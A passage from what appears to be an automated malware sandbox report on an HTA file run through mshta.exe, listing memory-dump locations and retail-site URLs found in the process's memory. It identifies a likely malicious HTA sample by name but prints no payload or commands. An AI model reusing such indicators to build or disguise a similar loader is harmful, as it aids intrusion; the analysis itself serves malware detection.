mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12512233499.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579924983.000000000C0AD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/agro-industria-e-comercio?chave=pfm_home_agro_menu
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574494320.0000000009615000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores/aquecedores-de-ar?chave=pfm_hm
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_clima
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_climaW
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=dk_hm_at_climae9(
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.00000000095E6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_hm_tt_1_0_ar-condici
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511752644.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577567437.000000000AACD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/ar-condicionado-e-aquecedores?chave=pfm_home_ar_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/artesanato?chave=pfm_home_artesanato_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559145889.000000000AB6E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000095CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496397360.00000000095D8000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/artigos-de-festas?chave=pfm_home_festas_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menu
Source: mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12554832793.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/audio?chave=pfm_home_audio_menuBp
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486157607.0000000009DA5000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486575456.0000000009DAC000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486376745.0000000009DA8000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12486650176.0000000009DAE000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508336331.000000000BE85000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AAE3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AAE0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577643255.000000000AAE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475890850.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=dk_hm_at_automotivo
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508760414.000000000BDF1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506503755.000000000A99B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511332893.000000000A99C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555859176.000000000BDFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12480570290.000000000BE62000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508682956.000000000BE70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396527148.00000000069EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476053747.000000000A9D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/automotivo?chave=pfm_home_automotivo_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494206184.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12580042948.000000000C11A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508798468.000000000BE76000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12579155988.000000000BE7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508608881.000000000BE68000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502755774.000000000BE67000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12551145227.000000000AB11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511180045.000000000AB10000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478586213.000000000C119000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/bebes?chave=pfm_home_bebes_menu
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C0AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.000000000715E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelos
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelosi(
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.americanas.com.br/categoria/beleza-e-perfumaria/cabelos?chave=dk_hm_at_cabelossq)
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502000266.00000000095DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566800059.00000000095DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 